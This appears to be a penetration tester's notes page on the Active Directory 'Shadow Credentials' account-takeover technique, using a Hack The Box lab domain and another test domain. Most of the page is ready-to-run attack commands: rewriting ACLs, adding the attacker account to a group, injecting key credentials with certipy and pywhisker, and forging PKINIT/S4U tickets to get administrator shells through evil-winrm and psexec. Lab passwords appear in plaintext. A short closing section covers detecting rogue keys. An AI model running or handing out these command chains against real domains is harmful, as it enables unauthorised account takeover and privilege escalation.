Shadow Credentials

Overview

This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates.

Unless you have some rights in the Certerficate authority this attack will only be available in the key trust model.

Key trust

pros

• Doesnt require ca to setup

• Does use tpm cons

• No centralized administration. Keys must be disabled per object

• self signed cert (arguably the whole problem with this model)

Pre-requisites

Besides the ability to write the attribute msDS-KeyCredentialLink on a target user or computer, for this technique to work, the environment must be set up as follows:

• At least one Windows Server 2016 Domain Controller.

• A digital certificate for Server Authentication installed on the Domain Controller.

• Windows Server 2016 Functional Level in Active Directory.

• Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

• Domain must have at least one DC running with Windows Server 2016 that supports PKINIT.

Steps to perform - windows

$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Network Audit" -Rights All -PrincipalIdentity m.lovegod -DomainController dc.absolute.htb
Add-DomainGroupMember -Credential $cred -Identity "Network Audit" -member m.lovegod -Domain "absolute.htb"
Get-DomainGroupMember -Credential $cred -Identity "Network Audit" -Domain "absolute.htb" -DomainController "dc.absolute.htb" | fl MemberName

kinit m.lovegod
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb 
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb

Steps to perform - Linux

#Install dacledit branch of impacket
git clone https://github.com/shutdown/impacket -b dacledit
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install .

#Write yourself some ACLs on the object
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!'

#Add yourself to the group
net rpc group addmem 'Network Audit' m.lovegod -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Verify
net rpc group members 'Network Audit' -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc

#Use certipy for shadow credential
kinit m.lovegod #or impacket=gettgt
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb

#Restore ACLs
dacledit.py -action restore -file ./impacket/examples/dacledit-20240508-144024.bak -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!' -k

Performing with other tools

python3 pywhisker.py -d "zsm.local" -u "marcus" -p '!QAZ2wsx' -t 'ZPH-SVRMGMT1$' --action "add" -P P@ssw0rd -f cert

python ../PKINITtools/gettgtpkinit.py 'zsm.local/ZPH-SVRMGMT1$' -cert-pfx cert.pfx -pfx-pass P@ssw0rd zph-svrmgmt1.ccache

export KRB5CCNAME=zph-svrmgmt1.ccache

python ../PKINITtools/gets4uticket.py kerberos+ccache://'zsm.local\ZPH-SVRMGMT1$':zph-svrmgmt1.ccache@192.168.210.10 cifs/zph-svrmgmt1.zsm.local@zsm.local administrator@zsm.local admin.ccache -v

export KRB5CCNAME=admin.ccache

impacket-psexec -k ZPH-SVRMGMT1.ZSM.LOCAL

AD Auditing

![[Pasted image 20240510073403.png]] This can be used to find orphaned or malicious keys existing in AD.

Also the DSInternals module can find ROCA vulnerable / weak keys in AD

cleaning up a user and device object in ad will affect ALL devices a user has access to (DSInternals allows selective deletion of keys) ![[Pasted image 20240510074200.png]]![[Pasted image 20240510074315.png]]